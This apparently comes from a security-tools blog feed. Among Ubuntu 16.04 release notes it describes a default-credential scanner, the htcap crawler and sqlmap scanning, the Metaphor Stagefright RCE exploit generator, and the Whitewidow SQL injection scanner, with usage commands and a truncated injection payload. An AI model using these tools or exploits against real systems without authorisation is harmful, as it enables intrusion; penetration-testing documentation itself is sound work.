TCP 1081 192.165.63.181 111.248.100.185 1446175412 1446175412 1
TCP 1081 192.165.63.181 111.248.102.150 1446183374 1446183374 1
TCP 1081 192.165.63.181 36.225.254.129 1446170512 1446170512 1
TCP 1095 192.165.63.181 36.229.233.199 1446177047 1446177047 1
TCP 111 192.165.63.181 80.82.65.219 1446181028 1446181028 1
TCP 111 192.165.63.181 94.102.52.44 1446181035 1446181035 1
TCP 11122 192.165.63.181 222.186.56.39 1446198391 1446198391 1
TCP 11211 192.165.63.181 74.82.47.43 1446200598 1446200598 1
TCP 135 192.165.63.181 1.160.12.156 1446163293 1446163294 3
TCP 135 192.165.63.181 104.174.148.124 1446178211 1446178212 3
TCP 135 192.165.63.181 106.242.5.179 1446180063 1446180064 3
TCP 135 192.165.63.181 173.30.55.76 1446184279 1446195229 6
TCP 135 192.165.63.181 174.100.28.2 1446179470 1446202911 9
TCP 135 192.165.63.181 218.253.225.163 1446174945 1446195646 9
TCP 135 192.165.63.181 219.114.66.114 1446169303 1446183947 6
TCP 135 192.165.63.181 222.186.56.43 1446165515 1446202626 5
...
where proto represents the protocol used by the initiator (e.g. TCP in the first entry) coming from src_ip (e.g. 222.186.56.107 ) toward our <dst_ip:dst_port> service (e.g. 192.165.63.181:1080 ); first_seen is the time of that day's first connection attempt in Unix timestamp format (e.g. 1446188056 , which stands for Fri, 30 Oct 2015 06:54:16 GMT ); last_seen is that day's last connection attempt (in the first entry it equals first_seen ); and count holds the total number of connection attempts.
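Since the layout is fixed, a day's file is easy to post-process. A short sketch (assuming comma-separated fields, as the .csv extension suggests) that ranks source IPs by total connection attempts:
import csv
from collections import Counter

hits = Counter()
with open("2015-10-27.csv") as f:
    reader = csv.DictReader(f)  # header row: proto,dst_port,dst_ip,src_ip,first_seen,last_seen,count
    for row in reader:
        hits[row["src_ip"]] += int(row["count"])

for ip, total in hits.most_common(5):
    print("%-16s %d" % (ip, total))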
Results can be accessed through the HTTP reporting interface (Note: default port is 8339 ):



Changeme - A Default Credential Scanner

changeme is designed to make it simple to add new credentials without having to write any code or modules.

changeme keeps credential data separate from code. All credentials are stored in YAML files so they can be both easily read by humans and processed by changeme. Credential files can be created using the mkcred.py tool and answering a few questions.
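To illustrate the idea of YAML-backed credentials, here is a hypothetical entry parsed with PyYAML; changeme's real schema may differ, so treat the field names as assumptions (mkcred.py generates the real files):
import yaml

doc = """
name: Apache Tomcat
category: web
default_port: 8080
credentials:
  - username: tomcat
    password: tomcat
  - username: admin
    password: admin
"""

entry = yaml.safe_load(doc)
for pair in entry["credentials"]:
    print("%s -> trying %s:%s" % (entry["name"], pair["username"], pair["password"]))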

Installation

Use pip to install the python modules:
pip install -r requirements.txt

Usage Examples

Scan a subnet for default creds:
./changeme.py -s 192.168.59.0/24

Scan a single host:
./changeme.py -s 192.168.59.100

Scan a subnet for Tomcat default creds and set the timeout to 5 seconds:
./changeme.py -s 192.168.59.0/24 -n "Apache Tomcat" --timeout 5


Ubuntu 16.04 LTS (Xenial Xerus) - The leading OS for PC, tablet, phone and cloud


Ubuntu is an ancient African word meaning ‘humanity to others’. It also means ‘I am what I am because of who we all are’. The Ubuntu operating system brings the spirit of Ubuntu to the world of computers.

Where did it all begin?

Linux was already established as an enterprise server platform in 2004, but free software was not a part of everyday life for most computer users. That’s why Mark Shuttleworth gathered a small team of developers from one of the most established Linux projects — Debian — and set out to create an easy-to-use Linux desktop: Ubuntu.
The vision for Ubuntu is part social and part economic: free software, available to everybody on the same terms, and funded through a portfolio of services provided by Canonical.

Ubuntu releases

The Ubuntu team broke new ground in committing to a programme of scheduled releases on a predictable six-month basis. It was decided that every fourth release, issued on a two-year basis, would receive long-term support (LTS). LTS releases are typically used for large-scale deployments.

Ubuntu is different from the commercial Linux offerings that preceded it because it doesn’t divide its efforts between a high-quality commercial version and a free ‘community’ version. The commercial and community teams collaborate to produce a single, high-quality release, which receives ongoing maintenance for a defined period. Both the release and ongoing updates are freely available to all users.

New features in 16.04 LTS


Snap application format

Ubuntu 16.04 LTS introduces a new application format, the ‘snap’, which can be installed alongside traditional deb packages. These two packaging formats live quite comfortably next to one another and enable Ubuntu to maintain its existing processes for development and updates. More information is available here.

Updated Packages

As with every new release, packages (applications and software of all kinds) are being updated at a rapid pace. Many of these packages came from an automatic sync from Debian's unstable branch; others have been explicitly pulled in for Ubuntu 16.04.
For a list of all packages being accepted for Ubuntu 16.04, please subscribe to xenial-changes.

Linux kernel 4.4

Ubuntu 16.04 LTS is based on the long-term supported Linux release series 4.4.

Python 3

Python 2 is no longer installed by default on the server, cloud and touch images; long live Python 3! Python 3 itself has been upgraded to the 3.5 series.
If you have your own programs based on Python 2, fear not! Python 2 will continue to be available (as the python package) for the foreseeable future. However, to best support future versions of Ubuntu you should consider porting your code to Python 3. Python/3 has some advice and resources on this.

VIM defaults to python3

The default VIM package has been built against python3 instead of python2. This means plugins that require python2 interpreter support from VIM will not work anymore. In this case, alternative VIM packages that still use python2 are available, for example vim-gnome-py2. They can be made the default via the alternatives mechanism:
  • sudo update-alternatives --set vim /usr/bin/vim.gnome-py2

Golang 1.6

The Go toolchain was upgraded to the 1.6 series, and gccgo was upgraded to GCC 6.1 release candidate 1. Thus the same level of standard library and compiler features is provided by both compilers on all fully supported architectures.

OpenSSH 7.2p2

Recent OpenSSH releases disable several pieces of weak, legacy, and/or unsafe cryptography. If you are upgrading a system remotely over SSH, you should check that you are not relying on these to ensure that you will retain access after the upgrade.
  • Support for the legacy SSH version 1 protocol is disabled by default at compile time. Note that this also means that the Cipher keyword in ssh_config(5) is effectively no longer usable; use Ciphers instead for protocol 2. The openssh-client-ssh1 package includes "ssh1", "scp1", and "ssh-keygen1" binaries which you can use if you have no alternative way to connect to an outdated SSH1-only server; please contact the server administrator or system vendor in such cases and ask them to upgrade.
  • Support for the 1024-bit diffie-hellman-group1-sha1 key exchange is disabled by default at run-time. It may be re-enabled using the upstream instructions.
  • Support for ssh-dss, ssh-dss-cert-* host and user keys is disabled by default at run-time. These may be re-enabled using the upstream instructions.
  • Support for the legacy v00 cert format has been removed.
  • Several ciphers are disabled by default in ssh: blowfish-cbc, cast128-cbc, all arcfour variants and the rijndael-cbc aliases for AES.
  • MD5-based and truncated HMAC algorithms are disabled by default in ssh.

GNU toolchain

glibc was updated to the 2.23 release, binutils to the 2.26 release, and GCC to a recent snapshot from the GCC 5 branch (post GCC 5.3.0).

Apt 1.2

Apt 1.2 includes the new privilege separation features introduced in Apt 1.1. Importantly, the unprivileged "_apt" user is now used when making outgoing network connections and parsing the results for the various apt transport methods (HTTP, HTTPS, FTP).

Ubuntu for IBM LinuxONE and z Systems

Ubuntu 16.04 LTS includes a new port to 64-bit z/Architecture for IBM mainframe computers. This is a practically complete port of Ubuntu Server and Cloud with circa 95% binary package availability. We are excited to enable OpenStack software, Juju, MAAS, LXD, and much more on this platform.
For more information about this port see S390X page.

Ubuntu Desktop

The general theme for 16.04 on the desktop is one of bug fixes and incremental quality improvements.

General

  • GNOME is mostly upgraded to 3.18. GLib upgraded to 2.48 (corresponding to GNOME 3.20)
  • GNOME Software replaces Ubuntu Software Center. This brings a faster store experience and moves our archive metadata in line with Debian. It has been renamed "Ubuntu Software" to improve recognition for Ubuntu Software Center users.
  • All default applications and libraries ported to use WebKit 2
  • GNOME Calendar is now included by default
  • Empathy and Brasero are removed from the default installation
  • Chromium upgraded to version 48
  • Firefox upgraded to version 45
  • Online searches in the dash are now disabled by default
  • Improved HiDPI support in the greeter
  • Added more supported languages by default More info
  • Multiple bug fixes

Unity & Compiz

  • Improved launcher integration with file manager and devices
  • Support for formatting removable devices from quicklist
  • Improved support for gtk applications using headerbars
  • Improvements to the switcher and spread backends
  • Activate app spread by Super+Ctrl+W
  • Unity control center option to always show menus
  • Improvements to GNOME key grabbing
  • New dash overlay scrollbars
  • Better Dash theming support
  • Support for scaling cursors in HiDPI environments
  • Show icons launching state in launcher when apps launched elsewhere
  • Launcher can be moved to the bottom

LibreOffice

LibreOffice 5.1 brings a lot of improvements to the entire package. For more information on these improvements please see the LibreOffice release notes available here. You can see a video highlighting some of the new features here.

General

Writer word processor

Calc spreadsheets

  • Exponential and power trend lines handle negative Y values
  • Performance improvements leveraging SSE3 for SUM functions
  • Added support for PNG export
  • Search for numbers as formatted/displayed

Impress presentations

  • Slide transitions use OpenGL 2.1+ and new transitions added
  • Keyboard shortcuts for navigation and sorting
  • Screensaver inhibiting for KDE, XFCE, Mate

Ubuntu Server

General

New in 16.04, the kernel crash dump mechanism now supports remote kernel crash dumps. It is now possible to send kernel crash dumps to a remote server using the SSH or NFS protocols. Details of the new functionality are available in the Ubuntu Server Guide.

OpenStack Mitaka

Ubuntu 16.04 includes the latest OpenStack release, Mitaka, including the following components:
  • OpenStack Identity - Keystone
  • OpenStack Imaging - Glance
  • OpenStack Block Storage - Cinder
  • OpenStack Compute - Nova
  • OpenStack Networking - Neutron
  • OpenStack Telemetry - Ceilometer and Aodh
  • OpenStack Orchestration - Heat
  • OpenStack Dashboard - Horizon
  • OpenStack Object Storage - Swift
  • OpenStack Database as a Service - Trove
  • OpenStack DNS - Designate
  • OpenStack Bare-metal - Ironic
  • OpenStack Filesystem - Manila
  • OpenStack Key Manager - Barbican
Please refer to the OpenStack Mitaka release notes for full details of this release of OpenStack.
OpenStack Mitaka is also provided via the Ubuntu Cloud Archive for OpenStack Mitaka for Ubuntu 14.04 LTS users.
Ubuntu 16.04 also includes the first GA release of the Nova driver for LXD ('nova-lxd').
WARNING: Upgrading an OpenStack deployment is a non-trivial process and care should be taken to plan and test upgrade procedures which will be specific to each OpenStack deployment.
Make sure you read the OpenStack Charm Release Notes for more information about how to deploy Ubuntu OpenStack using Juju.

libvirt 1.3.1

Libvirt has been updated to the 1.3.1 release.

qemu 2.5

Qemu has been updated to the 2.5 release.

Open vSwitch 2.5.0

Ubuntu 16.04 includes the latest release of Open vSwitch, 2.5.0. This is also an LTS release of Open vSwitch.
Ubuntu 16.04 also includes support for Open vSwitch integrated with DPDK (Data Plane Development Kit) enabling fast packet processing through userspace usage of compatible networking cards - see the openvswitch-switch-dpdk package for more details.

Ceph Jewel

Ubuntu 16.04 includes the latest release candidate (10.1.2) of the Ceph Jewel stable release; an update to the final release version will be delivered as an SRU to Ubuntu 16.04.
For full details on the Ceph Jewel release, please refer to the upstream release notes.

Nginx

Ubuntu 16.04 includes version 1.9.15 of the Nginx web server, with an expectation to provide the next stable release of Nginx, 1.10.0, as an SRU after release (which will be virtually identical to 1.9.15). This version of Nginx also includes HTTP/2 support, which supersedes SPDY support previously provided in the Nginx packages.

LXD 2.0

Ubuntu 16.04 LTS includes LXD, a new, lightweight, network-aware container manager offering a VM-like experience built on top of Linux containers.
LXD comes pre-installed with all Ubuntu 16.04 server installations, including cloud images, and can easily be installed on the Desktop version too. It can be used standalone through its simple command line client, through Juju to deploy your charms inside containers, or with OpenStack for large scale deployments.
All the LXC components, LXC, LXCFS and LXD in Ubuntu 16.04 LTS are at version 2.0.
Learn more about LXD here: http://www.ubuntu.com/cloud/lxd/
And discover all the LXD 2.0 features with: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/

docker 1.10

Docker was upgraded to version 1.10. Note that this requires migration of existing images to a new format, which will be performed on the first start of the service. This migration can take a long time and put a high load on the system; see https://docs.docker.com/engine/migration/ for more information.

PHP 7.0

PHP was upgraded to 7.0. Note that this will require modifications to custom PHP extensions (https://wiki.php.net/phpng-upgrading) and may require modifications to PHP source code (http://php.net/manual/en/migration70.php).
  • NGINX and PHP 7.0
Most PHP-dependent packages were either rebuilt or upgraded for PHP7.0 support. Where that was not possible, packages may have been removed from the archive. There was one exception, Drupal7.
  • Drupal7 does not pass upstream testing with PHP7.0 as of the 16.04 release (https://www.drupal.org/node/2656548). An SRU will be provided once upstream PHP7.0 support is available and verified. Until that time, the drupal7 package will not be installable in 16.04.

MySQL 5.7

MySQL has been updated to 5.7. Some configuration directives have been changed or deprecated, so if you are upgrading from a previously customised configuration then you will need to update your customisation appropriately. See bug 1571865 for details.
Password behaviour when the MySQL root password is empty has changed. Packaging now enables socket authentication when the MySQL root password is empty. This means that a non-root user can't log in as the MySQL root user with an empty password. For details, see the NEWS file.

Juju 2.0

Juju and Juju UI have been updated to 2.0beta4. The final Juju 2.0 release will come via an update post-release. The package name is juju-2.0. Juju 1.25.5 is available in the juju package for existing production environments. Please read the upgrade documentation before moving to 2.0
Juju now supports modelling workloads on AWS, Microsoft Azure, Google Cloud Engine, Rackspace, Joyent, LXD, MAAS, and manual deployments.



Get Ubuntu 16.04 LTS


Download Ubuntu 16.04 LTS


Images can be downloaded from a location near you.
You can download ISOs from:
http://releases.ubuntu.com/16.04/ (Ubuntu Desktop, Server, and Snappy Core)

Upgrading from Ubuntu 14.04 LTS or 15.10

14.04 LTS to LTS upgrades will be enabled with the 16.04.1 LTS release, in approximately 3 months' time.
To upgrade on a desktop system:
  • Open the "Software & Updates" Setting in System Settings.
  • Select the 3rd Tab called "Updates".
  • Set the "Notify me of a new Ubuntu version" dropdown menu to "For any new version" if you are using 15.10, set it to "long-term support versions" if you are using 14.04 LTS.
  • Press Alt+F2 and type in "update-manager" (without the quotes) into the command box.
  • Software Updater should open up and tell you: New distribution release '16.04 LTS' is available.
  • Click Upgrade and follow the on-screen instructions.
To upgrade on a server system:
  • Install the update-manager-core package if it is not already installed.
  • Make sure /etc/update-manager/release-upgrades is set to normal if you are using 15.10, or to lts if you are using 14.04 LTS.
  • Launch the upgrade tool with the command sudo do-release-upgrade.
  • Follow the on-screen instructions.
Note that the server upgrade will use GNU screen and automatically re-attach in case of dropped connection problems.
There are no offline upgrade options for Ubuntu Desktop and Ubuntu Server. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above. 

Alternative downloads

There are several other ways to get Ubuntu including torrents, which can potentially mean a quicker download, our network installer for older systems and special configurations and links to our regional DVD image mirrors for our older (and newer) releases. If you don’t specifically require any of these installers, we recommend using our default installers.

Network installer

The network installer lets you install Ubuntu over the network. This is useful, for example, if you have an old machine with a non-bootable CD-ROM or a computer that can’t run the graphical interface-based installer, either because they don’t meet the minimum requirements for the live CD/DVD or because they require extra configuration before the graphical desktop can be used, or if you want to install Ubuntu on a large number of computers at once.

BitTorrent

BitTorrent is a peer-to-peer download network that sometimes enables higher download speeds and more reliable downloads of large files. You will need to install a BitTorrent client on your computer in order to enable this download method.

Htcap - web application scanner able to crawl single page applications (SPA) in a recursive manner by intercepting ajax calls and DOM changes


htcap is a web application scanner able to crawl single page applications (SPA) in a recursive manner by intercepting ajax calls and DOM changes.

Htcap is not just another vulnerability scanner, since it's focused mainly on the crawling process and uses external tools to discover vulnerabilities. It's designed to be a tool for both manual and automated penetration tests of modern web applications.

The scan process is divided into two parts: first htcap crawls the target and collects as many requests as possible (urls, forms, ajax etc.) and saves them to an SQLite database. When the crawling is done, it is possible to launch several security scanners against the saved requests and save the scan results to the same database.

When the database is populated (at least with crawling data), it's possible to explore it with readily available tools such as sqlite3 or DBeaver, or export the results in various formats using the built-in scripts.

QUICK START
Let's assume that we have to perform a penetration test against target.local, first we crawl the site:
$ htcap/htcap.py crawl target.local target.db
Once the crawl is done, the database (target.db) will contain all the requests discovered by the crawler. To explore/export the database we can use the built-in scripts or ready available tools.
For example, to list all discovered ajax calls we can use a single shell command:
$ echo "SELECT method,url,data FROM request WHERE type = 'xhr';" | sqlite3 target.db
Now that the site is crawled it's possible to launch several vulnerability scanners against the requests saved to the database. A scanner is an external program that can fuzz requests to spot security flaws.
Htcap uses a modular architecture to handle different scanners and execute them in a multi-threaded environment. For example we can run ten parallel instances of sqlmap against saved ajax requests with the following command:
$ htcap/htcap.py scan -r xhr -n 10 sqlmap target.db
Htcap comes with sqlmap and arachni modules built-in.
Sqlmap is used to discover SQL injection vulnerabilities and arachni is used to discover XSS, XXE, code executions, file inclusions etc.
Since scanner modules extend the BaseScanner class, they can be easily created or modified (see the section "Writing Scanner Modules" of this manual).
Htcap comes with several standalone scripts to export the crawl and scan results.
For example, we can generate an interactive report containing the relevant information about the website/webapp with the command below.
The relevant information includes, for example, the list of all pages that trigger ajax calls or websockets, and the ones that contain vulnerabilities.
$ htcap/scripts/htmlreport.py target.db target.html
To scan a target with a single command use/modify the quickscan.sh script.
$ htcap/scripts/quickscan.sh https://target.local

SETUP

Requirements
  1. Python 2.7
  2. PhantomJS v2
  3. Sqlmap (for sqlmap scanner module)
  4. Arachni (for arachni scanner module)

Download and Run
$ git clone https://github.com/segment-srl/htcap.git htcap
$ htcap/htcap.py
Alternatively you can download the latest zip here .
PhantomJs can be downloaded here . It comes as a self-contained executable with all libraries linked statically, so there is no need to install or compile anything else.
Htcap will search for the phantomjs executable in the locations listed below and in the paths listed in the $PATH environment variable:
  1. ./
  2. /usr/bin/
  3. /usr/local/bin/
  4. /usr/share/bin/
To install htcap system-wide:
# mv htcap /usr/share/
# ln -s /usr/share/htcap/htcap.py /usr/local/bin/htcap
# ln -s /usr/share/htcap/scripts/htmlreport.py /usr/local/bin/htcap_report
# ln -s /usr/share/htcap/scripts/quickscan.sh /usr/local/bin/htcapquick

DEMOS
You can find an online demo of the html report here and a screenshot of the database view here
You can also explore the test pages here to see what the report has been generated from. They also include a page to test ajax recursion .

EXPLORING DATABASE
In order to read the database it's possible to use the built-in scripts or any readily available sqlite3 client.

BUILT-IN SCRIPT EXAMPLES
Generate the html report. (demo report available here )
$ htcap/scripts/htmlreport.py target.db target.html
List all pages that trigger ajax requests:
$ htcap/scripts/ajax.py target.db
Request ID: 6
Page URL: http://target.local/dashboard
Referer: http://target.local/
Ajax requests:
[BUTTON txt=Statistics].click() -> GET http://target.local/api/get_stats
List all discovered SQL-Injection vulnerabilities:
$ htcap/scripts/vulns.py target.db "type='sqli'"
C O M M A N D
python /usr/local/bin/sqlmap --batch -u http://target.local/api/[...]

D E T A I L S
Parameter: name (POST)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: id=1' AND 4163=CAST [...]
[...]

QUERY EXAMPLES
Search for login forms
SELECT referer, method, url, data FROM request WHERE type='form' AND (url LIKE '%login%' OR data LIKE '%password%')
Search inside the pages html
SELECT url FROM request WHERE html LIKE '%upload%' COLLATE NOCASE
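The same queries can also be run programmatically; a short sqlite3 sketch against the request table the crawler populates:
import sqlite3

conn = sqlite3.connect("target.db")
rows = conn.execute(
    "SELECT referer, method, url, data FROM request "
    "WHERE type='form' AND (url LIKE '%login%' OR data LIKE '%password%')"
)
for referer, method, url, data in rows:
    print(method, url)
conn.close()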

AJAX CRAWLING
Htcap features an algorithm able to crawl ajax-based pages in a recursive manner.
The algorithm works by capturing ajax calls, mapping DOM changes to them, and repeating the process recursively against the newly added elements.
When a page is loaded, htcap starts by triggering all events and filling input values with the aim of triggering ajax calls. When an ajax call is detected, htcap waits until it is completed and the relative callback is called; if, after that, the DOM is modified, htcap runs the same algorithm against the added elements and repeats it until all the ajax calls have been fired.
         _________________
        |                 |
        |load page content|
        '--------,--------'
                 |
                 |
         ________V________
        |  interact with  |
        |   new content   |<-----------------------------------------+
        '--------,--------'                                          |
                 |                                                   |
                 |                                               YES |
           ______V______         ________________             ______l______
          /    AJAX     \ YES   |                |           /   CONTENT   \
         {  TRIGGERED?   }----->|   wait ajax    |---------->{   MODIFIED?   }
          \ ___________ /       '----------------'           \ ___________ /
                 | NO                                              | NO
                 |                                                 |
         ________V________                                         |
        |                 |                                        |
        |     return      |<---------------------------------------+
        '-----------------'
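In code form, the loop in the diagram reads roughly like this (a self-contained Python sketch with the browser hooks passed in as functions; illustrative only, not htcap's internals):

def crawl(elements, trigger, ajax_fired, added_elements):
    # trigger(el) fires events and fills inputs on one element;
    # ajax_fired() waits for captured ajax calls and their callbacks,
    # returning True if any fired; added_elements() returns the DOM
    # nodes those callbacks added.
    for el in elements:
        trigger(el)
        if ajax_fired():
            new = added_elements()
            if new:
                crawl(new, trigger, ajax_fired, added_elements)  # recurse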

COMMAND LINE ARGUMENTS
$ htcap crawl -h
usage: htcap [options] url outfile
Options:
-h this help
-w overwrite output file
-q do not display progress information
-m MODE set crawl mode:
- passive: do not interact with the page
- active: trigger events
- aggressive: also fill input values and crawl forms (default)
-s SCOPE set crawl scope
- domain: limit crawling to current domain (default)
- directory: limit crawling to current directory (and subdirectories)
- url: do not crawl, just analyze a single page
-D maximum crawl depth (default: 100)
-P maximum crawl depth for consecutive forms (default: 10)
-F even if in aggressive mode, do not crawl forms
-H save HTML generated by the page
-d DOMAINS comma separated list of allowed domains (ex *.target.com)
-c COOKIES cookies as json or name=value pairs separated by semicolon
-C COOKIE_FILE path to file containing COOKIES
-r REFERER set initial referer
-x EXCLUDED comma separated list of urls to exclude (regex) - i.e. logout urls
-p PROXY proxy string protocol:host:port - protocol can be 'http' or 'socks5'
-n THREADS number of parallel threads (default: 10)
-A CREDENTIALS username and password used for HTTP authentication separated by a colon
-U USERAGENT set user agent
-t TIMEOUT maximum seconds spent to analyze a page (default 300)
-S skip initial url check
-G group query_string parameters with the same name ('[]' ending excluded)
-N don't normalize URL path (keep ../../)
-R maximum number of redirects to follow (default 10)
-I ignore robots.txt



Metaphor - Stagefright with ASLR bypass


By Hanan Be'er from NorthBit Ltd.


Metaphor's source code is now released! The source includes a PoC that generates MP4 exploits in real time and bypasses ASLR. The PoC includes lookup tables for the Nexus 5 Build LRX22C with Android 5.0.1. The server side of the PoC consists of simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.

The exploit generator is written in Python and used by the PHP code.
usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...

positional arguments:
{leak,rce,suicide} Type of exploit to generate

optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
Override exploit configuration
-o OUTPUT, --output OUTPUT
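By way of example, an invocation derived from the usage line above (the output file name is illustrative, not a documented example) might be:
$ python metaphor.py -o leak.mp4 leak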
Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.


IPGeoLocation - A tool to retrieve IP Geolocation information


A tool to retrieve IP Geolocation information, powered by ip-api.

Requirements
Python 3.x

Features
  • Retrieve IP or Domain Geolocation.
  • Retrieve your own IP Geolocation.
  • Retrieve Geolocation for IPs or Domains loaded from file. Each target in new line.
  • Define your own custom User Agent string.
  • Select random User-Agent strings from file. Each User Agent string in new line.
  • Proxy support.
  • Select random proxy from file. Each proxy URL in new line.
  • Open IP geolocation in Google Maps using the default browser.
  • Export results to csv, xml and txt format.

Geolocation Information
  • ASN
  • City
  • Country
  • Country Code
  • ISP
  • Latitude
  • Longitude
  • Organization
  • Region Code
  • Region Name
  • Timezone
  • Zip Code
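These fields map onto the JSON returned by the ip-api.com endpoint that powers the tool. A minimal sketch of the underlying request using only Python 3's standard library (independent of the tool itself):

import json
import urllib.request

def geolocate(target):
    # free ip-api.com endpoint; heavily rate-limited (the tool's banner
    # warns of a ban above ~150 requests per minute)
    url = "http://ip-api.com/json/%s" % target
    with urllib.request.urlopen(url) as resp:
        return json.load(resp)  # keys include country, city, lat, lon, isp, org

print(geolocate("8.8.8.8")["country"])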

Usage
$ ./ip2geolocation.py
usage: ipgeolocation.py [-h] [-m] [-t TARGET] [-T file] [-u User-Agent]
[-U file] [-g] [--noprint] [-v] [--nolog] [-x PROXY]
[-X file] [-e file] [-ec file] [-ex file]

IPGeolocation 2.0.3

--[ Retrieve IP Geolocation information from ip-api.com
--[ Copyright (c) 2015-2016 maldevel (@maldevel)
--[ ip-api.com service will automatically ban any IP addresses doing over 150 requests per minute.

optional arguments:
-h, --help show this help message and exit
-m, --my-ip Get Geolocation info for my IP address.
-t TARGET, --target TARGET
IP Address or Domain to be analyzed.
-T file, --tlist file
A list of IPs/Domains targets, each target in new line.
-u User-Agent, --user-agent User-Agent
Set the User-Agent request header (default: IP2GeoLocation 2.0.3).
-U file, --ulist file
A list of User-Agent strings, each string in new line.
-g Open IP location in Google maps with default browser.
--noprint IPGeolocation prints Geolocation info to the terminal by default; use this option to suppress that output.
-v, --verbose Enable verbose output.
--nolog IPGeolocation saves a .log file by default; use this option to disable log files.
-x PROXY, --proxy PROXY
Setup proxy server (example: http://127.0.0.1:8080)
-X file, --xlist file
A list of proxies, each proxy url in new line.
-e file, --txt file Export results.
-ec file, --csv file Export results in CSV format.
-ex file, --xml file Export results in XML format.

Examples
Retrieve your IP Geolocation
  • ./ip2geolocation.py -m
Retrieve IP Geolocation
  • ./ip2geolocation.py -t x.x.x.x
Retrieve Domain Geolocation
  • ./ip2geolocation.py -t example.com
Do not save .log files
  • ./ip2geolocation.py -t example.com --nolog
Custom User Agent string
  • ./ip2geolocation.py -t x.x.x.x -u "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
Using Proxy
  • ./ip2geolocation.py -t x.x.x.x -x http://127.0.0.1:8080
Using random Proxy
  • ./ip2geolocation.py -t x.x.x.x -X /path/to/proxies/filename.txt
Pick User-Agent string randomly
  • ./ip2geolocation.py -t x.x.x.x -U /path/to/user/agent/strings/filename.txt
Retrieve IP geolocation and open location in Google maps with default browser
  • ./ip2geolocation.py -t x.x.x.x -g
Export results to CSV file
  • ./ip2geolocation.py -t x.x.x.x --csv /path/to/results.csv
Export results to XML file
  • ./ip2geolocation.py -t x.x.x.x --xml /path/to/results.xml
Export results to TXT file
  • ./ip2geolocation.py -t x.x.x.x -e /path/to/results.txt
Retrieve IP Geolocation for many targets
  • ./ip2geolocation.py -T /path/to/targets/targets.txt
Retrieve IP Geolocation for many targets and export results to xml
  • ./ip2geolocation.py -T /path/to/targets/targets.txt --xml /path/to/results.xml
Do not print results to terminal
  • ./ip2geolocation.py -m -e /path/to/results.txt --noprint


PenQ - The Security Testing Browser Bundle


PenQ is an open source Linux-based penetration testing browser bundle built on Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generation and many more. PenQ is not just a mix of add-ons: it comes preconfigured with some very powerful open source Java/Python and command-line tools, including Nikto, Wfuzz, OWASP ZAP, OWASP WebSlayer, OWASP WebScarab, Tor and lots more.

It also provides tutorials by linking to the OWASP Testing Guide, a vast source of security testing knowledge with a list of useful resources, and the OWASP project. PenQ can be used to test for the OWASP Top 10 risks to safeguard web applications against vulnerabilities.


Testing Solution for SMBs


A secure website is crucial to any online business - small, medium or enterprise scale. PenQ can save companies from huge investments in proprietary tools and over-sized testing teams. Integrated with resource links, security guidelines, and testing tools, PenQ empowers even less experienced testers to do a thorough job of checking for security loopholes.

A Slew of Tools


PenQ lets security testers access necessary system utilities and tools right from their browser, saving time and making tests a lot faster. Tools built-in range from those for anonymous browsing and system monitoring to ones for taking down notes and scheduling tasks. View the entire set of tools under features.

Debian Based


PenQ is configured to run on Debian based distributions including Ubuntu and its derivative distros, and penetration testing operating systems such as BackTrack and Kali.

With all its integrations, PenQ is a powerful tool. Be mindful of what use you put it to. Responsible use of PenQ can help secure web apps in a zap.

Features

  • OWASP ZAP
  • Wfuzz Web Application Fuzzer
  • PenTesting Report Generator
  • OWASP WebScarab
  • Mozilla Add-ons Collection
  • Vulnerability Databases Search
  • OWASP WebSlayer
  • Integrated Tor
  • Access to Shell and System Utilities
  • Nikto Web Server Scanner
  • OWASP Penetration Testing Checklist
  • Collection of Useful Links

Full List of Mozilla Add-ons


  • anonymoX 
  • Awesome Screenshot 
  • ChatZilla 
  • CipherFox 
  • Clear Console 
  • Cookies Manager+ 
  • Cookie Monster 
  • CryptoFox 
  • Email Extractor 
  • Firebug 
  • FireFlow 
  • FireFTP 
  • FireSSH 
  • Greasemonkey 
  • Groundspeed 
  • HackBar 
  • HackSearch 
  • Header Spy
  • HttpFox 
  • HttpRequester 
  • JavaScript Deobfuscator 
  • Library Detector 
  • LinkSidebar 
  • Proxy Selector
  • Proxy Tool
  • RefControl 
  • RESTClient
  • Session Manager
  • SQL Inject Me
  • SQLite Manager
  • TrashMail.net
  • User Agent Switcher
  • Wappalyzer
  • Web Developer
  • Xinha Here!
  • XSS Me

Tested on

  • Ubuntu 10.04
  • Ubuntu 10.10
  • Ubuntu 11.04
  • Ubuntu 11.10
  • Ubuntu 12.04
  • Ubuntu 12.10
  • Ubuntu 13.04
  • BackTrack R1
  • BackTrack R2
  • BackTrack R3
  • Debian6
  • Linux Mint
  • Kali Linux
  • Backbox


How to Install


Download the PenQ package. Open the command-line interface (CLI) and navigate to the location of the downloaded file.
cd [path to PenQ file]
Assign executable permission to this file.
chmod +x PenQ-installer-1.0.sh
Run PenQ installer file from CLI.
./PenQ-installer-1.0.sh
Provide the sudo password and wait for the installation to complete. Once installed, double-click the PenQ icon on the desktop, or open the terminal and run the following
penq

How to Uninstall 


Navigate to the PenQ folder
cd /usr/share/PenQ
Run the following command
sudo ./uninstallPenq 

Whitewidow - SQL Vulnerability Scanner


Whitewidow is an open source automated SQL vulnerability scanner that is capable of running through a file list or scraping Google for potentially vulnerable websites. It features automatic file formatting, random user agents, IP addresses, server information, multiple SQL injection syntaxes, and a fun environment. This program was created for learning purposes, and is intended to teach users what vulnerabilities look like.

Usage
ruby whitewidow.rb -h Will print the help page
ruby whitewidow.rb -e Will print the examples page
ruby whitewidow.rb -f <path/to/file> Will run Whitewidow through a file. You do not need to provide the full path to the file, just the path within the whitewidow directory itself, without a leading slash. Example:
- whitewidow.rb -f tmp/sites.txt #<= CORRECT
- whitewidow.rb -f /home/users/me/whitewidow-1.0.6/tmp/sites.txt #<= INCORRECT
ruby whitewidow.rb -d Will run whitewidow in default mode and scrape Google using the search queries in the lib directory

Dependencies
gem 'mechanize'
gem 'nokogiri', '~> 1.6.7.2'
gem 'rest-client'
gem 'colored'
To install all gem dependencies, run the following:
